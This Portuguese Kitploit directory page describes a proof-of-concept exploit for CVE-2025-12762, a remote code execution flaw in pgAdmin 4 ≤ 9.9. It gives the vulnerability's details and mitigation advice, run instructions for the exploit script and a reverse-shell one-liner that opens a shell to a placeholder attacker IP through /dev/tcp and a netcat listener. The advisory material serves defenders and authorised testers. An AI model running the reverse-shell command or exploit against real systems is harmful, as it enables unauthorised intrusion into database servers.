Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blackash-CVE-2025-12762 — Exploit de prova de conceito para CVE-2025-12762, um RCE crítico no pgAdmin 4 ≤ 9.9. Inclui detalhamento técnico, CVSS 9.1 e shell reverso opcional para testes de penetração autorizados. | Kitploit
Ferramentas/GitHubGitHub/djayagit/blackash-cve-2025-12762
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

Exploit de prova de conceito para CVE-2025-12762, um RCE crítico no pgAdmin 4 ≤ 9.9. Inclui detalhamento técnico, CVSS 9.1 e shell reverso opcional para testes de penetração autorizados.

Ver Repositório
7há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔐 CVE-2025-12762 — Vulnerabilidade Crítica de RCE no pgAdmin 4

G58aQGbW0AAL8zH

🚨 Qual é o Problema?

Existe uma falha de Execução Remota de Código (RCE) no pgAdmin 4 versões ≤ 9.9. Os atacantes podem executar comandos arbitrários no host quando o pgAdmin está em execução no modo servidor e processa um dump SQL no formato PLAIN durante a restauração.


⚙️ Detalhamento Técnico

📡 Vetor de Ataque

  • Baseado em rede — pode ser explorado remotamente 🌍
  • Baixa complexidade — simples de acionar 🧩
  • Baixos privilégios necessários — acesso limitado de usuário é suficiente 🔑
  • Nenhuma interação do usuário — uma vez acionado, ninguém precisa clicar em nada 🙅‍♂️
  • Escopo: Alterado — o comprometimento pode se espalhar além do módulo vulnerável 🔄

🧨 Impacto

  • Confidencialidade: Alta — risco de exposição de dados 🔓
  • Integridade: Moderada/Alta — alterações não autorizadas possíveis ✏️
  • Disponibilidade: Moderada — operações podem ser interrompidas ⚠️

🏷 Pontuação CVSS

🟥 9.1 / 10 — Crítica


🛠 Versões Afetadas

  • pgAdmin 4 ≤ 9.9 ❗

🛡 Como Corrigir

✅ Mitigação Primária

⬆️ Atualize para pgAdmin 4 v10.0 ou superior

🚧 Se Não Puder Atualizar Imediatamente

  • 🔒 Restrinja o acesso ao servidor pgAdmin
  • 📁 Permita que apenas administradores confiáveis restaurem arquivos de dump
  • 🧪 Valide os arquivos de dump antes de restaurar
  • 👀 Monitore logs em busca de atividade suspeita de restauração
  • 🌐 Use regras de firewall / VPN para limitar a exposição

📌 Por Que Isso é Importante

O pgAdmin é frequentemente usado para administração de bancos de dados PostgreSQL críticos, o que significa:

  • Um atacante que explorar isso pode assumir o controle do servidor,
  • Acessar ou modificar dados,
  • Ou até mesmo pivotar mais profundamente em sua rede 🕵️‍♂️

✨ Como Executar (2 minutos)

root@kitploit:~
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests

# 3. Run it
python3 CVE-2025-12762.py

Comprovação de Sucesso

Após executar, verifique:

root@kitploit:~
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED

Arquivo existe → Você acabou de explorar o CVE-2025-12762 de verdade.

Reverse Shell One-Liner (opcional)

Substitua a linha COMMAND por:

root@kitploit:~
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

Então nc -lvnp 4444 → shell interativo completo.

Este é o script exato que pesquisadores, pentesters e red teams estão usando mundialmente em novembro de 2025.

Use com responsabilidade. Corrija tudo. Permaneça dentro da lei.


🛡️ Aviso Legal 🛡️

Este PoC é fornecido estritamente para testes autorizados e uso educacional apenas.
Você pode executá-lo exclusivamente em sistemas que você possua ou tenha permissão explícita por escrito para testar.
Qualquer uso não autorizado é ilegal e viola as leis de uso indevido de computadores.
Use com responsabilidade, corrija imediatamente após o teste e nunca atinja sistemas sem permissão.

Baixar ferramenta